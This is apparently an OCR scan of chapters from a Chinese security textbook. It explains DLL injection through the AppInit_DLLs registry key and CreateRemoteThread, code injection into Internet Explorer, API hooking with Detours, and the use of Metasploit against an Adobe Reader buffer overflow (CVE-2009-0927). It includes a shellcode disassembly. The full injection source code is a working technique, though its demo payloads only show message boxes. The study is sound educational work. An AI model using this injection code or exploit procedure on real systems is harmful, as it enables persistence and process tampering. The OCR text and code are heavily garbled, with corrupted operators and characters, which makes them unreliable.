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AppInit DLLs 在 这 里 填写 DLL 路 径 ， 以 逗号 分 隔 
LoadAppInit DLLs |AppInit DLLs 启 用 /禁用 标志 






























































AppInit_DLLs 中 所 配置 的 DLL 是 通过 user32.dll 来 加 载 的 ， 因 此 ， 
对 于 原本 就 不 依赖 〈 不 加 载 ) user32.dll 的 进程 来 说 ， 这 一 配置 是 无 效 的 
( 源 代 码 见 chap04\writeappinit\writeappinit )。 


Y writeappinit.cpp 


#include "stdafx.h" 
#include <Windows.h> 


int tmain(int argc, _TCHAR* argv[]) 
{ 
if(arge < 2){ 
fprintf(stderr, "%s «DLL Name>\n", argv[0]); 
return Ty 


HKEY hKey; 

LSTATUS lResult = RegOpenKeyEx(HKEY LOCAL MACHINE, 
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 
NULL, KEY ALL ACCESS, &hKey) ; 

if(lResult != ERROR_SUCCESS) { 
printf("Error: RegOpenKeyEx failed.\n") ; 


return -1; 


DWORD dwSize, dwType; 
TCHAR szDllName [256]; 


RegQueryValueEx (hKey, 

"AppInit DLLs", NULL, &dwType, NULL, &dwSize); 
RegQueryValueEx (hKey, 

"AppInit DLLs", NULL, &dwType, (LPBYTE)szDllName, &dwSize); 
printf("AppInit DLLs: %s -> ", szDllName); 
lstrcpy(szDllName, argv[11); 


lResult - RegSetValueEx(hKey, "AppInit DLLs", 
0, REG SZ, (PBYTE)szDllName, lstrlen(szDllName) + 1); 
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if(lResult !- ERROR SUCCESS) { 
printf("Error: RegSetValueEx failed. Wn") 


RegQueryValueEx (hKey, 

"AppInit_DLLs", NULL, &dwType, NULL, &dwSize); 
RegQueryValueEx (hKey, 

"AppInit_DLLs", NULL, &dwType, (LPBYTE)szDllName, &dwSize); 
printf("%s\n", szDllName); 


RegCloseKey (hKey) ; 
return 0; 


V 运行 示例 


C:\>writeappinit.exe "C: V Mloging.dll" 
AppInit_DLLs: -> C:\\loging.dll 


V 用 调试 器 打开 任意 一 个 程序 ， 查 看 模块 列表 


OllyDbg 一 Stir 





File View Debug Plugins Options Window Help 


aax »[uj oi +i] $jH| | sj r[r]w|r]w]u]c|z]x]s]n]--Js] EER] 
Cor 





INDOWSNSY 3t Sn32NUSERS2 tL 
INDOWSNsy stem32sADVAPI32.d1 1 
INDOWS\system32sRPCRT4. dll 
1. . INDOUS*system32*GDIS2.dll 
77F 49000) 06076000) 77F451FB „00. 2900. 5! INDOWS\system32\SHLWAPI.d LL 





writeappinit.cpp 可 以 向 注册 表 的 AppInit_DLLs 项 写 入 任意 值 ， 因 此 
我 们 可 以 指定 loging.dll 的 路 径 并 运行 这 个 程序 。 

在 Windows 7 中 ， 可 能 需要 将 LoadAppInit DLLs 的 值 改 为 “ 
青 大 家 用 regedit 确认 一 下 系统 当前 的 设置 。 

从 此 以 后 ， 几 是 加 载 了 user32.dll 的 进程 ， 同 时 也 会 加 载 loging.dll。 
我 们 可 以 测试 一 下 , H OllyDbg 打开 Stirling.exe， 查 看 一 下 模块 列表 ， 
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其 中 果然 有 loging.dll。 


4.2.4 通过 CreateRemoteThread 在 其 他 进程 中 创建 
线程 
我 们 可 以 用 CreateRemoteThread 这 个 API 函数 在 其 他 进程 中 创建 线 
程 ， 这 个 函数 可 以 在 新 线程 中 运行 LoadLibrary， 从 而 使 得 其 他 进程 强制 

















加 载 某 个 DLL。 
HANDLE CreateRemoteThread( 

HANDLE hProcess, // 进程 句柄 
LPSECURITY ATTRIBUTES lpThreadAttributes, 
DWORD dwStackSize, // 栈 初始 长 度 ( 字 节 数 ) 
LPTHREAD START ROUTINE lpStartAddress, 
LPVOID lpParameter, // 新 线程 的 参数 指针 
DWORD dwCreationFlags, // 创建 标志 
LPDWORD lpThreadId // 分 配 的 线程 ID 指针 











不 过 ， 这 里 有 一 个 问题 ， 那 就 是 LoadLibrary 的 参数 必须 位 于 目标 
进程 内 部 ， 因 此 ，LoadLibrary 所 需要 的 参数 字符 串 必须 事先 写 人 目标 进 
程 的 内 存 空 间 中 ( 源 代 码 见 chap04\dllinjection\dllinjection )。 

















Y injectcode.h 
int InjectDLLtoProcessFromName (TCHAR *szTarget, TCHAR *szDllPath); 
int InjectDLLtoProcessFromPid(DWORD dwPid, TCHAR *szDllPath); 
int InjectDLLtoNewProcess(TCHAR *szCommandLine, TCHAR *szDllPath); 





上 面 三 个 函数 的 功能 如 下 。 











e InjectDLLtoProcessFromName 

按照 可 执行 文件 名 找到 相应 的 进程 并 注入 DLL 
e |njectDLLtoProcessFromPid 

按照 进程 ID 找到 相应 的 进程 并 注入 DLL 
e InjectDLLtoNewProcess 

创建 新 进程 并 注入 DLL 
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Y dilinjection.cpp 


#include "stdafx.h" 
#include <tlhelp32.h> 
#include "dllinjection.h" 


DWORD GetProcessIdFromName (TCHAR *szTargetProcessName) 


{ 


HANDLE hSnap = CreateToolhelp32Snapshot (TH32CS SNAPPROCESS, 0); 


if(hSnap -- INVALID HANDLE VALUE) 


return 0; 


PROCESSENTRY32 pe; 
pe.dwSize - sizeof(pe); 


DWORD dwProcessId - 0; 
BOOL bResult = Process32First(hSnap, &pe); 


while (bResult) { 
if(!lstromp(pe.szExeFile, szTargetProcessName) ) { 
dwProcessId = pe.th32ProcessID; 
break; 


} 


bResult = Process32Next (hSnap, &pe) ; 


} 


CloseHandle (hSnap) ; 


return dwProcessId; 


int InjectDLL(HANDLE hProcess, TCHAR *szDllPath) 
int szDllPathLen = lstrlen(szDllPath) + 1; 


PWSTR RemoteProcessMemory = (PWSTR)VirtualAllocEx(hProcess, 


NULL, szDllPathLen, MEM RESERVE|MEM COMMIT, PAGE @ 
READWRITE) ; 
if (RemoteProcessMemory == NULL) 


return -1; 





BOOL bRet = WriteProcessMemory (hProcess, 


int 
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RemoteProcessMemory, (PVOID)szDllPath, szDllPathLen, NULL); 
if(bRet -- FALSE) 


return 7 


PTHREAD START ROUTINE pfnThreadRtn; 
pfnThreadRtn = (PTHREAD START ROUTINE)GetProcAddress( 


GetModuleHandle("kernel32"), "LoadLibraryA"); 
if(pfnThreadRtn -- NULL) 
return -1; 


HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, 
pfnThreadRtn, RemoteProcessMemory, 0, NULL); 
if(hThread -- NULL) 


return 7 
WaitForSingleObject (hThread, INFINITE); 


VirtualFreeEx (hProcess, 
RemoteProcessMemory, szDllPathLen, MEM RELEASE); 


CloseHandle (hThread) ; 
return 0; 
InjectDLLtoExistedProcess (DWORD dwPid, TCHAR *szDllPath) 


HANDLE hProcess - OpenProcess( 
PROCESS CREATE THREAD | PROCESS VM READ | PROCESS VM ? 


WRITE | 


PROCESS VM OPERATION | PROCESS QUERY INFORMATION , 2 


FALSE, dwPid); 


if(hProcess -- NULL) 
return -1; 
/* 
BOOL bJudgeWow64; 
IsWow64Process(hProcess, &bJudgeWow64); 
if(bJudgeWow64 == FALSE) { 
CloseHandle (hProcess) ; 
return -1; 
} 
x 
if(InjectDLL(hProcess, szDllPath)) 
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ahale 


int 


int 
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return -1; 


CloseHandle (hProcess); 
return 0; 


InjectDLLtoProcessFromName (TCHAR *szTarget, TCHAR *szDllPath) 


DWORD dwPid - GetProcessIdFromName (szTarget); 
if(dwPid == 0) 
return -1; 
if (InjectDLLtoExistedProcess(dwPid, szDllPath)) 
return -1; 


return 0; 


InjectDLLtoProcessFromPid(DWORD dwPid, TCHAR *szDllPath) 


if (InjectDLLtoExistedProcess(dwPid, szDllPath)) 
return -1; 


return 0; 


InjectDLLtoNewProcess (TCHAR *szCommandLine, TCHAR *szDllPath) 


STARTUPINFO si; 
PROCESS INFORMATION pi; 


ZeroMemory(&si, sizeof (STARTUPINFO) ) ; 
Si.cb = sizeof (STARTUPINFO) ; 


BOOL bResult = CreateProcess(NULL, szCommandLine, NULL, NULL, 
FALSE, CREATE SUSPENDED, NULL, NULL, &si, &pi); 
if (bResult == FALSE) 


return -1; 


int nRet = -1; 
/* 
BOOL bJudgeWow64; 
IsWow64Process(pi.hProcess, &bJudgeWow64); 
if(bJudgeWow64 == FALSE) 

goto Exit; 
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E 
if(InjectDLL(pi.hProcess, szDllPath)) 
goto Exit; 
nRet = 0; 
Exit: 


ResumeThread (pi.hThread); 
CloseHandle (pi.hThread); 
CloseHandle (pi.hProcess); 


return nRet; 


v 运行 示例 


C:\>dllinjection.exe Name iexplore.exe "C:\\sampledll.d1l1" 


V Æ iexplore.exe 中 加 载 CAsampledll.dll ( sampledll.dll 只 是 显示 一 条 对 话 框 消息 ) 








n. msn. com/?oci dci ehp || || #4] | ><) 
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We BRK | us 基建 议 网 站 ” p) 网 页 快讯 库 ~ 
[E pA: gee ENDS. ore | | e c &- EO- S€£9- TAO-@ " 








AABN ”客户 端 ”MSN 桌面 主题 下 载 “IE11 官 方 下 载 


网 页 
数字 生活 ， 白领 门户 


MSN 中 文 网 中 K) 


DLL PROCESS ATTACH [EJE SF 路” 美 司令 突变 脸 向 华 示 好 ”厦门 血 站 叫 析 





常用 网 站 ”微软 官方 杀毒 (免费 | EEJ bum IE11 官 方 下 载 微软 商城 


资讯 娱乐 时 尚 汽车 BA 健康 银行 保险 ME 八卦 FRO 。 Sm 专题 试用 
深度 博览 历史 图 汇 商业 基金 财富 故事 电影 电视 演出 He 潮流 星座 
科技 数码 Win8 App 房产 新 房 家 居 装 修 租房 二 手 海外 











请 大 家 在 启动 Internet Explorer ( 以 下 简称 IE ) 32 位 版 本 的 状态 下 ， 
输入 上 面 的 命令 并 运行 。sampledll.dll 是 一 个 能 够 显示 DLL 加 载 / 3812 
状态 消息 的 程序 (文件 位 于 chapo4Mdllinjection Release, 15 fV 85 UL 
chap04\dllinjectionvsampledll )。 

dllinjection.exe 运行 时 以 及 IE 关闭 时 都 会 弹出 相应 的 消息 框 。 
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4.2.5 注入 函数 

刚才 我 们 用 CreateRemoteThread 调用 了 LoadLibrary。 当 然 ， 不 仅 
是 DLL， 只 要 我 们 能 够 将 任意 函数 (代码 ) 事先 复制 到 目标 进程 内 部 ， 
就 可 以 用 CreateRemoteThread 来 运行 它 。 

接 下 来 ， 我 们 来 看 一 个 对 IE (32 位 版 本 ) 注入 func 函数 的 例子 
( 源 代 码 见 chap04\codeinjection\codeinjection ). 























Ilin 











e 


Y codeinjection.cpp 


#include "stdafx.h" 


#include «windows.h» 


typedef HWND (WINAPI *GETFORGROUNDWINDOW) (void); 
typedef int  (WINAPI *MSGBOX) (HWND, PCTSTR, PCTSTR, UINT); 


typedef struct _injectdata { 

TCHAR szTitle[32]; 

TCHAR szMessage[32]; 

HANDLE hProcess; 

PDWORD pdwCodeRemote; 

PDWORD pdwDataRemote; 

MSGBOX fnMessageBox; 

GETFORGROUNDWINDOW fnGetForegroundWindow; 
} INJECTDATA, *PINJECTDATA; 





static DWORD WINAPI func(PINJECTDATA myAPI) 
{ 
myAPI->fnMessageBox ( (HWND) myAPI->fnGetForegroundWindow () , 
myAPI->szMessage, myAPI->szTitle, MB OK); 


/* 

if (myAPI->pCodeRemote != NULL) 
VirtualFreeEx (myAPI->hProcess, 
myAPI->pCodeRemote, 0, MEM RELEASE) ; 

if (myAPI->pDataRemote != NULL) 
VirtualFreeEx (myAPI->hProcess, 
myAPI->pDataRemote, 0, MEM RELEASE); 

ep 


int 
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return 0; 


_tmain(int argc,  TCHAR* argv[]) 


HMODULE h = LoadLibrary ("user32.d11") ; 
if(h == NULL) { 
printf ("ERR: LoadLibrary\n") ; 
return -1; 


INJECTDATA id; 


id.fnGetForegroundWindow - (GETFORGROUNDWINDOW) 
GetProcAddress( 
GetModuleHandle ("user32"), "GetForegroundWindow") ; 


id.fnMessageBox - (MSGBOX) 
GetProcAddress( 
GetModuleHandle("user32"), "MessageBoxA") ; 


lstrcpy(id.szTitle, "Message") ; 
lstrcpy(id.szMessage, "Hello World!"); 


HWND hTarget - FindWindow("IEFrame", NULL); 
if(hTarget == NULL) { 

printf ("ERR: FindWindow\n") ; 

goto _END1; 


DWORD dwPID; // PID of iexplore.exe 
GetWindowThreadProcessId(hTarget, (DWORD *) &dwPID) ; 
id.hProcess = OpenProcess (PROCESS CREATE THREAD | 
PROCESS QUERY INFORMATION | PROCESS VM OPERATION | 
PROCESS VM WRITE | PROCESS VM READ, FALSE, dwPID) ; 
if(id.hProcess == NULL) { 
printf ("ERR: OpenProcess\n") ; 
goto _END1; 


DWORD dwLen; 
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if((id.pdwCodeRemote = (PDWORD)VirtualAllocEx(id.hProcess, 
0, 4096, MEM COMMIT, PAGE EXECUTE READWRITE)) -- NULL) 


printf ("ERR: VirtualAllocEx (pdwCodeRemote) Wn"); 
goto _END2; 
) 
if((id.pdwDataRemote - (PDWORD)VirtualAllocEx(id.hProcess, 
0, 4096, MEM COMMIT, PAGE EXECUTE READWRITE)) -- NULL) 





printf ("ERR: VirtualAllocEx (pdwDataRemote) Wn"); 
goto _END3; 


WriteProcessMemory (id.hProcess, 

id.pdwCodeRemote, &func, 4096, &dwLen) ; 
WriteProcessMemory (id.hProcess, 

id.pdwDataRemote, &id, sizeof(INJECTDATA), &dwLen); 


HANDLE hThread - CreateRemoteThread(id.hProcess, NULL, 0, 
(LPTHREAD START ROUTINE)id.pdwCodeRemote, id. 7 
pdwDataRemote, 
0, &dwLen); 
if(hThread == NULL) { 
printf ("ERR: CreateRemoteThread\n") ; 
goto _END4; 


WaitForSingleObject (hThread, INFINITE) ; 
GetExitCodeThread (hThread, (PDWORD) &dwPID) ; 
CloseHandle (hThread) ; 


END4 : 

VirtualFreeEx(id.hProcess, id.pdwDataRemote, 0, MEM RELEASE) ; 
_END3 : 

VirtualFreeEx(id.hProcess, id.pdwCodeRemote, 0, MEM RELEASE); 
_END2: 

CloseHandle (id.hProcess); 

_END1: 

FreeLibrary (h) ; 





return 0; 
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v 运行 示例 


C:\>codeinjection.exe 


V 向 iexplore.exe 注入 func 函数 并 运行 
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当 我 们 在 启动 IE (32 位 版 本 ) 的 状态 下 运行 codeinjection.exe 时 ， 
就 会 将 func 函数 注入 到 IE 中 并 运行 它 。func 函数 的 功能 是 显示 一 个 
nd 大 家 可 以 看 到 我 们 成 功 地 在 TE 进程 内 部 运行 了 
func 函数 ， 这 就 说 明 我 们 的 代码 注入 成 功 了 。 

在 Windows 中 ， 只 要 拥有 足够 的 权限 ， 就 可 以 随意 访问 其 他 进程 的 
内 存 空间 ， 因 此 我 们 基本 上 可 以 自由 地 向 其 他 进程 注入 代码 ， 而 且 即 便 
我 们 的 程序 不 是 调试 器 ， 也 可 以 比较 容易 地 骗 过 其 他 的 进程 。 
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43 ”任意 替换 程序 逻辑 API FF 


4.3.1 API 钩子 的 两 种 类 型 

刚才 我 们 介绍 过 ， 在 程序 中 插入 额外 的 逻辑 称 为 “ 钧 子 ”， 而 其 中 
对 API 搬入 额外 逻辑 称 为 “API FAP”. 

API 钧 子 大 体 上 可 分 为 两 种 类 型 。 





























* 改写 目标 函数 开头 几 个 字 节 
* 改写 IAT ( Import Address Table， 导 入 地 址 表 ) 


其 中 IAT 型 钩子 在 Advanced Windows 一 书 中 有 详细 介绍 ， 有 兴趣 
的 读者 可 以 参考 一 下 。 


e Advanced Windows 
http://www.amazon.com/dp/15723 15482 


4.3. Ħ Detours 实现 一 个 简单 的 API 钩子 


下 面 我 们 用 微软 研究 院 发 布 的 一 个 叫 作 Detours 的 API FFE 
试 实现 一 个 简单 的 API AF. 

















e Detours 


http://research.microsoft.com/en-us/projects/detours/ 








从 去 编写 一 个 API 钩子 需要 大 量 的 代码 ， 但 使 用 Detours 库 我 们 用 
几 十 行 就 可 以 实现 一 个 API 钧 子 。 只 要 我 们 知道 DLL 所 导出 的 函数 ， 
就 可 以 在 运行 时 对 该 函数 的 调用 进行 支持 ( 下面 两 段 源 代码 见 chap04\ 


detourshook\detourshook )。 
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V detourshook.h 


#ifdef DETOURSHOOK EXPORTS 

#define DETOURSHOOK API _ declspec (dllexport) 
#else 

#define DETOURSHOOK API _ declspec (dllimport) 
#endif 


DETOURSHOOK API int WINAPI HookedMessageBoxA (HWND hWnd, 
LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) ; 


V dilmain.cpp 


#include "stdafx.h" 
#include "detours.h" 
#include "detourshook.h" 


static int (WINAPI * TrueMessageBoxA) (HWND hWnd, LPCTSTR lpText, 
LPCTSTR lpCaption, UINT uType) = MessageBoxA; 


DETOURSHOOK API int WINAPI HookedMessageBoxA (HWND hWnd, 
LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) 


int nRet = TrueMessageBoxA(hWnd, lpText, "Hooked Message", 2 
uType) ; 
return nRet; 


int DllProcessAttach (VOID) 
{ 
DetourRestoreAfterWith(); 
DetourTransactionBegin(); 
DetourUpdateThread (GetCurrentThread()); 
DetourAttach(&(PVOID&)TrueMessageBoxA, HookedMessageBoxA); 
if(DetourTransactionCommit() !- NO ERROR) 
return -1; 
return 0; 


int DllProcessDetach (VOID) 


DetourTransactionBegin(); 
DetourUpdateThread (GetCurrentThread()); 


) 
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DetourDetach(&(PVOID&)TrueMessageBoxA, HookedMessageBoxA); 
DetourTransactionCommit () ; 
return 0; 


BOOL APIENTRY DllMain( HMODULE hModule, 


DWORD ul reason for call, 
LPVOID lpReserved 
) 


Switch (ul reason for call) 

{ 

case DLL PROCESS ATTACH: 
DllProcessAttach(); 
break; 

case DLL THREAD ATTACH: 
break; 

case DLL THREAD DETACH: 
break; 

case DLL PROCESS DETACH: 
DllProcessDetach(); 
break; 








} 


return TRUE; 





上 面 的 代码 可 以 将 user32.dll Œ H HY PK% MessageBox A 替换 成 





HookedMessageBoxA。 请 大 家 将 下 面 的 文件 添加 到 工程 中 并 编译 。 

















* detours.cpp 

* detours.h 

* disasm.cpp 

e modules.cpp 


e detver.h 


24 DIIMain 收 8] DLL PROCESS ATTACH 消息 时 ， 会 调用 








DlIProcessAttach() 函数 ， 也 就 是 说 ， 当 DLL 被 加 载 到 进程 
子 就 开始 生效 了 。 





HH, API $ 


DllProcessAttach 用 于 挂 载 钩 子 ，D1IProcessDetach H FARR. 
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在 函数 内 部 ， 会 先 调用 DetourTransactionBegin 和 DetourUpdateThread , 
然后 再 用 DetourAttach 或 者 DetourDetach 来 挂 载 或 解除 钩子 。 
最 后 ， 程 序 调用 DetourTransactionCommit 函数 并 退出 。 


4.3.8 修改 消息 框 的 标题 栏 


HookedMessageBoxA 函数 的 内 部 会 调用 TrueMessageBoxA ， 也 就 是 
原始 的 MessageBoxA Phat. 7j T fil HookedMessageBoxA 确实 被 调用 
过 ， 我 们 可 以 将 消息 框 的 标题 栏 改 为 “Hooked Message”. 

请 大 家 按 下 面 的 代码 编写 一 段 简单 的 程序 并 运行 ( 源 代 码 见 
chap04\detourshook\helloworld )。 





























Y helloworld.cpp 


#include "stdafx.h" 
#include <Windows.h> 


int _tmain(int argc,  TCHAR* argv[]) 
{ 
HMODULE h = LoadLibrary ("detourshook.d11") ; 
MessageBoxA (Get ForegroundWindow() , 
"Hello World! using MessageBoxA", "Message", MB OK) ; 
FreeLibrary (h) ; 
return 0; 


v 运行 示例 


C:\>helloworld.exe 


V 标题 栏 从 “Message” 变 成 了 “Hooked Message" 


Hooked Message 


Hello World! using MessageBox A 
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根据 环境 和 对 象 文件 的 不 同 ，API 钩子 也 有 各 种 各 样 的 实现 方法 ， 
Detours 是 用 一 种 非常 简单 的 方法 来 实现 的 ， 详 情 可 参见 下 面 的 文献 。 




















* Detours: Binary Interception of Win32 Functions 
http://research.microsoft.com/pubs/68568/huntusenixnt99.pdf 


钧 子 的 原理 是 将 函数 开头 的 几 个 字 节 替换 成 jmp 指令 ， 强 制 跳 转 到 
另 一 个 函数 。 大 家 可 以 用 OllyDbg 打开 挂 载 了 钩子 的 进程 ， 看 一 下 
MessageBoxA 函数 的 运行 过 程 ， 应 该 会 更 容易 理解 钩子 的 原理 。 

Detours 的 源 代 码 是 公开 的 ， 如 果 有 兴趣 的 话 希 望 大 家 去 读 一 读 。 

上 面 讲 到 的 API 钧 子 基本 上 只 适用 于 运行 在 用 户 领 域 的 DLL 所 导 
出 的 函数 ， 但 我 们 也 可 以 通过 劫持 非 公 开 的 API 等 方式 ， 对 运行 在 内 核 
领域 (Ring0 ) 的 驱动 程序 挂 载 钧 子 。 这 个 话题 包含 的 内 容 很 深 ,在 各 
种 环境 下 都 分 别 有 不 同 的 实现 方法 。 如 果 大 家 有 兴趣 深入 研究 一 下 API 
钧 子 ， 就 会 发 现 其 中 的 奥妙 还 是 非常 引人入胜 的 。 





















































— 专栏 : DLL 注入 和 API 钩子 是 “黑客 ”技术 的 代表 ?一 一 

大 家 听 到 “黑客 ”这 个 词 会 想到 什么 呢 ? 

在 日 本 ， 人 们 通常 会 联想 到 “入 侵 服 务 器 的 坏人 "“ 在 电脑 前 面 

喝 着 可 乐 坐 上 一 整 天 的 年 轻 人 ”等 形象 。 当 然 ， 有 很 多 人 会 说 “ 

实 这 个 词 原 本 指 的 是 …… ”"， 但 我 对 这 种 讨论 没什么 太 大 兴趣 。 

， 当 我 第 一 次 接触 DLL 注入 和 API HF ON, Hoe 

“也 许 这 就 是 所 谓 的 黑客 技术 吧 "。 

现在 ， 包 括 反 病 毒 软 件 在 内 ， 很 多 安全 产品 都 使 用 了 API F BR 

了 这 里 介绍 的 方法 以 外 ， 对 于 系统 内 核 所 调用 的 API 也 可 以 挂 载 钧 子 。 
DLL 注入 技术 也 被 广泛 用 于 各 种 产品 中 ， 例 如 微软 自家 的 安 

软件 EMET ( 下 一 章 中 介绍 ) 也 可 以 向 其 他 进程 加 载 DLL， 只 不 过 方 

法 有 些 区 别 而 已 。 
DLL 注入 和 API 钩子 都 是 属于 计算 机 安全 方面 的 技术 ， 但 它们 

的 实际 应 用 范围 要 广阔 得 多 。 



































































































































不 过 
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探索 更 广阔 的 世界 


TI] 






































] 之 前 所 学 习 的 知识 ， 用 各 种 工具 更 加 深入 地 探 











本 章 中 ,我 们 将 运 
索 二 进 制 世界 。 
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5.1 用 Metasploit Framework 验证 
和 调查 漏洞 


5.1.1 什么 是 Metasploit Framework 

Metasploit Framework 是 一 个 用 于 生成 和 运行 攻击 代码 的 框架 ， 通 
常 也 简称 为 Metasploit。 这 个 工具 有 Windows 版 和 Linux 版 ， 通 常用 来 
验证 和 调查 软件 的 漏洞 。 























e Metasploit 
https://www.rapid7.com/products/metasploit/ 











Metasploit 是 负责 调查 软件 漏洞 的 安全 工程 师 们 的 必 备 工具 ， 市 了 
上 上 也 出 版 了 一 些 专门 介绍 其 使 用 方法 的 图 书 。 




















5.1.2 ”安全 漏洞 的 信息 从 何 而 来 
各 种 安全 漏洞 的 信息 都 在 一 个 叫 作 CVE Common Vulnerabilities 
and Exposures ) 的 数据 库 中 进行 统一 管理 。 





e Search the CVE Web Site 
http://cve.mitre.org/find/index.html 








其 中 每 一 条 漏洞 都 被 编号 ， 格 式 如 CVE-XXXX-YYYY (其 中 
XXXX 为 年 份 ，YYYY 为 序号 )。 根 据 漏洞 编号 ， 我 们 可 以 从 CVE 的 网 
站 上 搜索 到 以 下 信息 。 





。 对 漏洞 的 描述 
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。 漏洞 所 影响 的 软件 
。 漏洞 所 影响 的 版 本 


只 要 我 们 知道 了 发 生 漏洞 的 软件 、 操 作 系 统 以 及 它们 的 版 本 ， 就 可 
以 搭建 一 个 相同 的 环境 ， 对 漏洞 进行 验证 和 调查 。 

例如 ， 我 们 可 以 搜索 CVE-2009-0927 这 个 漏洞 。 这 是 一 个 缓冲 区 洲 
出 的 漏洞 ， 发 生 漏洞 的 软件 为 Adobe Reader 和 Adobe Acrobat， 版 本 为 
9.1, 8.1.3, 7.1.1 以 及 更 早 版 本 。 





Y CVE-2009-0927 的 搜索 结果 


&£ CVE - CVE-2009-0927 x 

















© > Œ | cvemitre.org/cgi-bin/cvename.cgi?name-CVE-2009-0927 v= 
About CVE Printer-Friendly View 
Documents” Oe d 
Documents CVE 
FAQs CVE-2009-0927 Learn more at National Vulnerability Database idera b 
CVE List iew 
CVE-ID Syntax Change * Severity Rating « Fix Information » Vulnerable Software CVE-ID Syntax Change 
About CVE Identifiers Versions « SCAP Mappings E 
paci E Description P EUN 
Search NVD =] 
Updates & RSS Feeds Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 an 
Request a CVE-ID before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code CVE-ID Syntax Test 
CVE In Use via a crafted argument to the getIcon method of a Collab object, a different Data 

vulnerability than CVE-2009-0658. 
CVE-Compatible Products ty About CVE Identifiers 
Pere references e 
piis ael Note: References are provided for the convenience of the reader to help distinguish between zr 
CVSS for Scoring CVE-IDs vulnerabilities. The list is not intended to be complete. Editorial Policies 
CVE Numbering Authorities CVE Editor's 
(CNAs) Commentary 
News & Events * BUGTRAQ:20090324 ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability Reference Key/Maps 
Calendar * URL:http://www.securityfocus.com/archive/1/archive/1/502116/100/0/threaded Search Tips 
Free Newsletter * EXPLOIT-DB:9579 SE Bn 

















5.1.3 搭建 用 于 测试 漏洞 的 环境 

要 实际 测试 漏洞 ， 我 们 需要 准备 符合 条 件 的 软件 、 版 本 甚至 操作 系 
统 。 大 部 分 主流 软件 在 网 站 上 都 能 找到 历史 版 本 ， 因 此 我 们 可 以 利用 这 
一 点 获取 指定 版 本 的 软件 。 

这 几 年 Adobe 和 Java 的 漏洞 挺 多 的 ， 不 过 我 们 还 是 可 以 从 网 站 上 
获取 到 历史 版 本 的 软件 。 





e Adobe Archive 
ftp://ftp.adobe.com/pub/adobe/reader/win/ 
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* Oracle Java Archive 
http://www.oracle.com/technetwork/java/archive-139210.html 





当 我 们 准备 好 环境 之 后 ， 就 可 以 用 Metasploit 来 攻击 这 个 漏洞 了 。 


5.1.4. 利用 漏洞 进行 攻击 

Metasploit 有 很 多 功能 ， 要 想 完 全 掌握 不 容易 ， 但 尝试 一 些 简单 的 
攻击 还 是 不 难 的 。 软 件 的 安装 方法 请 参见 本 书 的 附录 。 

Metasploit 的 网 站 上 对 于 各 种 攻击 方式 都 有 详细 的 文档 。 打 开 
Metasploit Console 之 后 ， 只 要 按照 文档 上 的 例子 来 输入 命令 就 可 以 了 。 




















* Metasploit Auxiliary Module & Exploit Database (DB) 
http://www.rapid7.com/db/modules/ 

e Adobe Collab.getlcon() Buffer Overflow 
http://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0927 





下 面 我 们 用 CVE-2009-0927 来 尝试 一 下 。 
首先 ， 从 Adobe Archive 中 下 载 Adobe Reader v9.0 并 安装 。 

然后 ， 启 动 Metasploit Console， 输 入 下 图 中 的 命令 ， 随 后 画面 上 会 
显示 出 一 个 能 够 访问 到 攻击 代码 的 URL. 

大 家 可 以 将 这 个 URL 粘贴 到 浏览 器 中 访问 ， 也 可 以 下 载 PDF 文件 
再 用 Adobe Reader 打开 。 用 浏览 需 访问 时 ， 需 要 进行 设置 ， 让 浏览 需 自 
动 打开 Adobe Reader。 

没有 意外 的 话 ， 当 打开 PDF 文件 之 后 ， 桌 面 上 会 弹出 Windows it 
算 器 程序 。 















































E 
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jr 








V 用 Metasploit 生成 攻击 代码 


[> System Console 
File Edit "View Help 
s-euw|mnb|e 


Metasploit Pro Conso. [B system Console 


5.1. 


-'Hello' TITL 








一 专栏 : 深入 探索 shellcode 

























































































































































































使 用 Metasploit， 可 以 根据 环境 和 目的 自动 生成 shellcode。 不 
过 出 于 学 习 的 目的 ， 台 还 是 自己 编写 shellcode 比较 好 ， 等 理解 
了 其 原理 之 后 再 用 工具 来 提高 效率 。 

生成 shellcode 需要 使 用 Metasploit 附带 的 msfpayload 工具 。 





e msfpayload 
metasploit\apps\pro\msf3\msfpayload 


从 Metasploit Console 中 可 以 点 击 


System Console 打开 系统 命令 行 o 





单 File — New Tab 一 





H 






































V 使 用 msfpayload 生成 Windows 环境 下 运行 的 shellcode 


t System Console 
File Edit View Help 
|0 














V x.bin 


seg000 : 
seg000: 
seg000: 
seg000: 
seg000: 
seg000: 
seg000 : 
Seg000 : 
Seg000 : 
seg000 : 
seg000 : 
seg000 : 
seg000 : 
seg000 : 
Seg000 : 
seg000 : 
Seg000 : 
seg000 : 
seg000 : 
seg000: 
seg000: 
seg000: 
seg000: 
seg000: 
seg000: 
seg000: 
seg000: 
seg000: 
seg000 : 
Seg000 : 
seg000: 
seg000: 
seg000: 
seg000 : 
seg000: 
Seg000: 
seg000 : 
seg000 : 
seg000: 


00000000 
00000001 
00000006 
00000007 
00000009 
0000000B 
0000000F 
00000012 
00000015 
00000015 
00000015 
00000018 
0000001C 
0000001E 
0000001E 
0000001E 
00000020 
00000021 
00000023 
00000025 
00000027 
00000027 
00000027 
0000002A 
0000002C 
0000002E 
0000002F 
00000030 
00000033 
00000036 
00000038 
0000003B 
0000003D 
0000003F 
00000041 
00000042 
00000045 
00000048 
0000004A 











5.1 











cld 
call 
pusha 
mov 
xor 
mov 
mov 


mov 


loc 15: 
mov 
movzx 


XOr 


loc 1E: 
Xor 
lodsb 
cmp 
3t 
sub 


Tog 27: 
ror 
add 
loop 
push 
push 
mov 
mov 
add 
mov 
test 
JZ 
add 
push 
mov 
mov 
add 





Metasploit Framework 验证 


loc 8F 
ebp, esp 
edx, edx 


edx, fs: [edx+30h] 
edx, [edx+0Ch] 
edx, [edx+14h] 


esi, [edx+28h] 





E 和 调查 


ecx, word ptr [edx+26h] 


edi, edi 


eax, eax 


aul, Guüm s Ua 
short loc 27 


cui, mm p C 1 
edi, ODh 

edi, eax 

loc 1E 

edx 

edi 


edx, [edx+10h] 
eax, [edx«3Ch] 
eax, edx 

eax, [eax+78h] 
eax, eax 
short loc_89 
eax, edx 

eax 

ecx, [eax+18h] 
ebx, [eax+20h] 


ebx, edx 





局 洞 
